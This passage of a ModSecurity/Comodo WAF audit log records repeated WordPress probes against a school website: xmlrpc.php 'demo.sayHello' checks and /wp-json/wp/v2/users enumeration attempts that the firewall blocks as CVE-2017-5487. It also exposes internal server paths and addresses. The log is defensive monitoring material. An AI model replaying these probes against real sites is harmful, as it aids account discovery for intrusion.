Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ed7e524-Z-- --af00e02f-A-- [08/May/2025:05:36:01 +0700] aBvgUcP9GxxPAbCroFbL-wAAAEo 103.236.140.4 39442 103.236.140.4 8181 --af00e02f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af00e02f-C-- demo.sayHello --af00e02f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af00e02f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657361377841 6069 (- - -) Stopwatch2: 1746657361377841 6069; combined=4375, p1=562, p2=3583, p3=31, p4=34, p5=97, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af00e02f-Z-- --0eeba957-A-- [08/May/2025:05:36:43 +0700] aBvge8P9GxxPAbCroFbMAQAAAE8 103.236.140.4 39456 103.236.140.4 8181 --0eeba957-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0eeba957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eeba957-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657403590177 2856 (- - -) Stopwatch2: 1746657403590177 2856; combined=1241, p1=424, p2=786, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eeba957-Z-- --b8b34056-A-- [08/May/2025:05:36:50 +0700] aBvggsP9GxxPAbCroFbMAwAAAEw 103.236.140.4 39460 103.236.140.4 8181 --b8b34056-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8b34056-C-- demo.sayHello --b8b34056-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8b34056-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657410103051 5430 (- - -) Stopwatch2: 1746657410103051 5430; combined=4009, p1=508, p2=3277, p3=25, p4=27, p5=100, sr=95, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8b34056-Z-- --c2225365-A-- [08/May/2025:05:37:10 +0700] aBvglsP9GxxPAbCroFbMBgAAAEk 103.236.140.4 39466 103.236.140.4 8181 --c2225365-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.252.18.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.252.18.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2225365-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2225365-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657430890976 3085 (- - -) Stopwatch2: 1746657430890976 3085; combined=1303, p1=436, p2=837, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2225365-Z-- --412ad450-A-- [08/May/2025:05:39:11 +0700] aBvhDys5rYyn3jlLjjK9egAAANE 103.236.140.4 39486 103.236.140.4 8181 --412ad450-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --412ad450-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --412ad450-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657551896339 12884 (- - -) Stopwatch2: 1746657551896339 12884; combined=21066, p1=433, p2=843, p3=0, p4=0, p5=9911, sr=75, sw=0, l=0, gc=9879 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --412ad450-Z-- --8f295a40-A-- [08/May/2025:05:39:18 +0700] aBvhFqcs1DvJ_HgMHE_wfwAAAAI 103.236.140.4 39492 103.236.140.4 8181 --8f295a40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8f295a40-C-- demo.sayHello --8f295a40-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f295a40-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657558188121 5407 (- - -) Stopwatch2: 1746657558188121 5407; combined=4090, p1=572, p2=3304, p3=29, p4=25, p5=93, sr=158, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f295a40-Z-- --e0593e52-A-- [08/May/2025:05:40:47 +0700] aBvhb8P9GxxPAbCroFbMCwAAAEU 103.236.140.4 39504 103.236.140.4 8181 --e0593e52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0593e52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0593e52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657647171059 2985 (- - -) Stopwatch2: 1746657647171059 2985; combined=1348, p1=460, p2=849, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0593e52-Z-- --16f97d65-A-- [08/May/2025:05:40:53 +0700] aBvhdcP9GxxPAbCroFbMDQAAAFA 103.236.140.4 39508 103.236.140.4 8181 --16f97d65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16f97d65-C-- demo.sayHello --16f97d65-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16f97d65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657653485072 5917 (- - -) Stopwatch2: 1746657653485072 5917; combined=4369, p1=533, p2=3604, p3=28, p4=32, p5=100, sr=73, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16f97d65-Z-- --ec6a483c-A-- [08/May/2025:05:46:25 +0700] aBviwacs1DvJ_HgMHE_whQAAAAs 103.236.140.4 39544 103.236.140.4 8181 --ec6a483c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ec6a483c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec6a483c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657985565746 3241 (- - -) Stopwatch2: 1746657985565746 3241; combined=1435, p1=506, p2=897, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec6a483c-Z-- --f2864b3c-A-- [08/May/2025:05:46:30 +0700] aBvixqcs1DvJ_HgMHE_whwAAABA 103.236.140.4 39548 103.236.140.4 8181 --f2864b3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f2864b3c-C-- demo.sayHello --f2864b3c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2864b3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657990950180 5072 (- - -) Stopwatch2: 1746657990950180 5072; combined=3974, p1=488, p2=3262, p3=32, p4=34, p5=93, sr=68, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2864b3c-Z-- --36e8fb79-A-- [08/May/2025:05:47:12 +0700] aBvi8Kcs1DvJ_HgMHE_wiQAAABM 103.236.140.4 39552 103.236.140.4 8181 --36e8fb79-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36e8fb79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36e8fb79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746658032851815 3503 (- - -) Stopwatch2: 1746658032851815 3503; combined=1523, p1=547, p2=943, p3=0, p4=0, p5=32, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36e8fb79-Z-- --94d0630a-A-- [08/May/2025:05:47:22 +0700] aBvi-sP9GxxPAbCroFbMDwAAAEs 103.236.140.4 39556 103.236.140.4 8181 --94d0630a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.60 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --94d0630a-C-- demo.sayHello --94d0630a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --94d0630a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746658042064050 5241 (- - -) Stopwatch2: 1746658042064050 5241; combined=3936, p1=479, p2=3244, p3=29, p4=25, p5=93, sr=86, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94d0630a-Z-- --47f00039-A-- [08/May/2025:05:49:24 +0700] aBvjdKcs1DvJ_HgMHE_wjAAAABI 103.236.140.4 39562 103.236.140.4 8181 --47f00039-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47f00039-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47f00039-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746658164199747 3285 (- - -) Stopwatch2: 1746658164199747 3285; combined=1442, p1=505, p2=904, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47f00039-Z-- --c07de70d-A-- [08/May/2025:05:49:31 +0700] aBvje8P9GxxPAbCroFbMEQAAAEQ 103.236.140.4 39566 103.236.140.4 8181 --c07de70d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c07de70d-C-- demo.sayHello --c07de70d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c07de70d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746658171438897 5048 (- - -) Stopwatch2: 1746658171438897 5048; combined=3766, p1=452, p2=3111, p3=22, p4=23, p5=92, sr=67, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c07de70d-Z-- --ae70be06-A-- [08/May/2025:05:51:56 +0700] aBvkDCs5rYyn3jlLjjK9gAAAANg 103.236.140.4 39590 103.236.140.4 8181 --ae70be06-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.215.213.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.215.213.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ae70be06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae70be06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746658316379499 3564 (- - -) Stopwatch2: 1746658316379499 3564; combined=1494, p1=480, p2=981, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae70be06-Z-- --c5884168-A-- [08/May/2025:05:58:22 +0700] aBvljo4K347NtBcwXKwDvQAAAIA 103.236.140.4 39616 103.236.140.4 8181 --c5884168-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.157.160.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.157.160.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c5884168-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5884168-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746658702938514 3312 (- - -) Stopwatch2: 1746658702938514 3312; combined=1460, p1=475, p2=953, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5884168-Z-- --ec871531-A-- [08/May/2025:06:20:23 +0700] aBvqtys5rYyn3jlLjjK9lgAAANc 103.236.140.4 39952 103.236.140.4 8181 --ec871531-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ec871531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec871531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri 